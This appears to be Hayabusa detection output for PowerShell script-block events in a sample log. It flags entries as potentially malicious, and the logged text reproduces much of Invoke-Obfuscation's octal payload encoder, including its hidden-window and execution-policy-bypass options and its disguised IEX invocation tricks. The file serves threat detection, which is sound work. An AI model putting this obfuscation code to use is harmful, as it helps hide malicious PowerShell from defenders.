157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) 